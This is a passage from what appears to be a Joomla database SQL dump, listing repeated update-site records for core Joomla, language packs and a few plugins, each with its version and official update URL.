AU','','pkg_en-AU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(372,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(373,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(374,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(375,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(376,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(377,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(378,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(379,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(380,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(381,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(382,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(383,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(384,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(385,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(386,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(387,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(388,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(389,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.6','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(390,1,0,0,'Joomla','','joomla','file','',0,'2.5.20','','http://update.joomla.org/core/extension.xml',''),(391,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(392,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(393,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(394,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(395,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(396,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(397,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(398,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(399,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(400,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(401,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(402,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(403,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(404,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(405,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(406,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.20.2','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(407,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(408,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(409,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(410,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(411,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(412,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(413,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(414,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(415,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(416,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(417,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(418,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(419,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(420,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(421,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(422,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(423,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(424,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(425,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(426,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(427,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.6','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(428,1,0,0,'Joomla','','joomla','file','',0,'2.5.20','','http://update.joomla.org/core/extension.xml',''),(429,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(430,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(431,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(432,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(433,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(434,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(435,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(436,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(437,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(438,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(439,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(440,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(441,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(442,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(443,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(444,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.20.2','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(445,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(446,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(447,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(448,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(449,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(450,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(451,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(452,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(453,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(454,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(455,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(456,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(457,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(458,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(459,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(460,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(461,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(462,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(463,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(464,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(465,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.7','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(466,1,0,0,'Joomla','','joomla','file','',0,'2.5.20','','http://update.joomla.org/core/extension.xml',''),(467,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(468,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(469,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(470,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(471,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(472,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(473,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(474,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(475,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(476,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(477,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(478,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(479,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(480,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(481,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(482,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.20.2','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(483,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(484,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(485,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(486,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(487,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(488,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(489,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(490,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(491,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(492,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(493,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(494,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(495,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(496,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(497,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(498,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(499,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(500,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(501,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(502,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(503,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.7','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(504,10,10085,0,'Simple Image Gallery','The most popular image gallery extension for Joomla!','jw_sig','plugin','content',0,'3.0.1','','http://www.joomlaworks.net/updates/jw_sig.xml','#'),(505,1,0,0,'Joomla','','joomla','file','',0,'2.5.20','','http://update.joomla.org/core/extension.xml',''),(506,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(507,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(508,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(509,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(510,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(511,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(512,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(513,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(514,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(515,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(516,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(517,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(518,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(519,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(520,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(521,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.20.2','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(522,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(523,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(524,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(525,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(526,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(527,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(528,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(529,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(530,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(531,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(532,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(533,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(534,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(535,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(536,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(537,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(538,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(539,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(540,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(541,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(542,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.7','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(543,1,0,0,'Joomla','','joomla','file','',0,'2.5.20','','http://update.joomla.org/core/extension.xml',''),(544,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(545,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(546,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(547,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(548,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(549,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(550,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(551,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(552,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(553,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(554,3,0,0,'Estonian','','pkg_et-EE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/et-EE_details.xml',''),(555,3,0,0,'Flemish','','pkg_nl-BE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-BE_details.xml',''),(556,3,0,0,'Macedonian','','pkg_mk-MK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/mk-MK_details.xml',''),(557,3,0,0,'Japanese','','pkg_ja-JP','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ja-JP_details.xml',''),(558,3,0,0,'Serbian Latin','','pkg_sr-YU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-YU_details.xml',''),(559,3,0,0,'Arabic Unitag','','pkg_ar-AA','package','',0,'2.5.20.2','','http://update.joomla.org/language/details/ar-AA_details.xml',''),(560,3,0,0,'German','','pkg_de-DE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/de-DE_details.xml',''),(561,3,0,0,'Norwegian Bokmal','','pkg_nb-NO','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/nb-NO_details.xml',''),(562,3,0,0,'English AU','','pkg_en-AU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-AU_details.xml',''),(563,3,0,0,'English US','','pkg_en-US','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/en-US_details.xml',''),(564,3,0,0,'Serbian Cyrillic','','pkg_sr-RS','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sr-RS_details.xml',''),(565,3,0,0,'Czech','','pkg_cs-CZ','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/cs-CZ_details.xml',''),(566,3,0,0,'Persian','','pkg_fa-IR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fa-IR_details.xml',''),(567,3,0,0,'Polish','','pkg_pl-PL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/pl-PL_details.xml',''),(568,3,0,0,'Syriac','','pkg_sy-IQ','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/sy-IQ_details.xml',''),(569,3,0,0,'Russian','','pkg_ru-RU','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ru-RU_details.xml',''),(570,3,0,0,'Catalan','','pkg_ca-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ca-ES_details.xml',''),(571,3,0,0,'Afrikaans','','pkg_af-ZA','package','',0,'2.5.16.1','','http://update.joomla.org/language/details/af-ZA_details.xml',''),(572,3,0,0,'Chinese Simplified','','pkg_zh-CN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/zh-CN_details.xml',''),(573,3,0,0,'Esperanto','','pkg_eo-XX','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/eo-XX_details.xml',''),(574,3,0,0,'Finnish','','pkg_fi-FI','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fi-FI_details.xml',''),(575,3,0,0,'Chinese Traditional','','pkg_zh-TW','package','',0,'2.5.19.1','','http://update.joomla.org/language/details/zh-TW_details.xml',''),(576,3,0,0,'Bosnian','','pkg_bs-BA','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/bs-BA_details.xml',''),(577,3,0,0,'Tamil India','','pkg_ta-IN','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/ta-IN_details.xml',''),(578,3,0,0,'Thai','','pkg_th-TH','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/th-TH_details.xml',''),(579,3,0,0,'Swahili','','pkg_sw-KE','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sw-KE_details.xml',''),(580,5,0,0,'System - Helix Framework','','helix','plugin','system',0,'2.1.7','','http://www.joomshaper.com/updates/plg_system_helix.xml',''),(581,1,0,0,'Joomla','','joomla','file','',0,'2.5.20','','http://update.joomla.org/core/extension.xml',''),(582,3,0,0,'Bahasa Indonesia','','pkg_id-ID','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/id-ID_details.xml',''),(583,3,0,0,'Danish','','pkg_da-DK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/da-DK_details.xml',''),(584,3,0,0,'Hungarian','','pkg_hu-HU','package','',0,'2.5.14.1','','http://update.joomla.org/language/details/hu-HU_details.xml',''),(585,3,0,0,'French','','pkg_fr-FR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/fr-FR_details.xml',''),(586,3,0,0,'Italian','','pkg_it-IT','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/it-IT_details.xml',''),(587,3,0,0,'Spanish','','pkg_es-ES','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/es-ES_details.xml',''),(588,3,0,0,'Dutch','','pkg_nl-NL','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/nl-NL_details.xml',''),(589,3,0,0,'Turkish','','pkg_tr-TR','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/tr-TR_details.xml',''),(590,3,0,0,'Slovak','','pkg_sk-SK','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/sk-SK_details.xml',''),(591,3,0,0,'Latvian','','pkg_lv-LV','package','',0,'2.5.20.1','','http://update.joomla.org/language/details/lv-LV_details.xml',''),(592,3,0,0,'Estonian','','pk